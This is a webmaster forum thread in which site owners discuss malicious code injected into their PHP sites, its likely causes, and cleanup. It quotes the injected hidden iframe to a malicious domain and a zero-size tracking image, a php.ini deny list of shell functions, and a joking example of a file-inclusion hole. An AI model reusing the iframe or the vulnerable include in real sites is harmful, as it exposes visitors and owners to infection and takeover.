People Who inject Stuff into PHP

[oscer]

Anyone ever seen that happen from these guys?


Registrant:
Kipec Ineara [email protected] +1.2128816540
Ineara inc
933 po box
New York,NY,US 10081

this is what was injected

iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"</iframe

[HomerSimpson]

just hate that injection shit....
never cared much about the code than how to clean it
and prevent from happening again...

[oscer]

Yea backups ... Luckily it was a personal site and i keep multiple backups

[k0nr4d]

99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.

[potter]

Quote:

Originally Posted by k0nr4d

99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.

eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.

[Some Guy]

That happened to me big-time last month. Every site of mine got hit. Every single index.html or index.php file on my server had random lines of code inserted. It royally fucked-up a few of my sites that used link exchange programs. Hugely annoying. It happened every day for a week. I spent countless hours trying to figure out what was going on. Fixing everything over and over again was a major bitch.

When I asked my hosting company about it (Colo-Cation, the best hosting company ever) they looked into it and told me that, as k0nr4d said, it was more than likely a virus on my own machine that was causing the issue. I ran a virus scan and changed every password on my server and it hasn't happened since.

[Twoface31]

this is shit

[k0nr4d]

Quote:

Originally Posted by potter

eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.

Usually files like index.html, index.php, etc are not writable by the http user, so a script would not have permissions to write to them to add said code. There are of course TGP scripts and such which write to flat files (therefor them having to be writable by the web user) which is the exception here.

That being said it's almost always a virus with this kind of thing. If not the site owner, then a designer or programmer they hired, an updater, anyone with ftp access. The first thing anyone should do is change all their passwords as soon as something like this happens.

[oscer]

Quote:

Originally Posted by k0nr4d

99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.

I havent used FTP in a good while ... I have scp program i use ...

I secured Php on the machine !

[BIGTYMER]

I had this happen on 12/06 on one my smaller sites. No other sites on the server were hit with it.

<img width=0 height=0 src="http://*REMOVED*.com/count.gif?id=*REMOVED*">

I was hit with malware around the same time...

[BIGTYMER]

Quote:

Originally Posted by oscer

Anyone ever seen that happen from these guys?


Registrant:
Kipec Ineara [email protected] +1.2128816540
Ineara inc
933 po box
New York,NY,US 10081

this is what was injected

iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"</iframe

They just reg'd that domain yesterday. I'd try calling that phone # tomorrow and I would report this to their host (Leksim Ltd).

[cybermike]

I got hit hard on my tgps.. they kept changing the top 2 rows to trafficshop and other urls.. took a while but seems that my host found the backdoors

Very annoying

[fatfoo]

It sucks. Don't inject the wrong thing.

[bl4h]

http://www.php.net/manual/en/intro.filter.php

[adult-help]

Quote:

Originally Posted by potter

eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.

i think this is the case most of the times. not our pc. bots scan for holes in scripts.also the server you host or even one account one host can be compromised.

[eroticsexxx]

Yes, I've heard that injecting stuff into your PeePee hurts.

I wouldn't recommend it.

[TeenCat]

they must be a doctors

[magicmike]

Yeah I've seen it before, will kill your SE listings as google will flag those sites as dangerous.

[seeandsee]

learn how to prevent

[john FVC]

Have had it happen in the past but the server folk ran a script to clean it up though it did take a few days as we had so much stuff on our servers. We are still with Webair and I think Webair have really got their security sorted out now.

[oscer]

added this to php.ini

disable_functions=readfile,shell_exec,exec,virtual ,passthru,proc_close,proc_get_status,proc_open,pro c_terminate,system

[myneid]

lol, my favorite is finding pages with
<?php
include_once($_REQUEST['page']);
?>

[wehateporn]

Quote:

Originally Posted by Some Guy

That happened to me big-time last month. Every site of mine got hit. Every single index.html or index.php file on my server had random lines of code inserted. It royally fucked-up a few of my sites that used link exchange programs. Hugely annoying. It happened every day for a week. I spent countless hours trying to figure out what was going on. Fixing everything over and over again was a major bitch.

When I asked my hosting company about it (Colo-Cation, the best hosting company ever) they looked into it and told me that, as k0nr4d said, it was more than likely a virus on my own machine that was causing the issue. I ran a virus scan and changed every password on my server and it hasn't happened since.

Someone said you can get that one from Torrents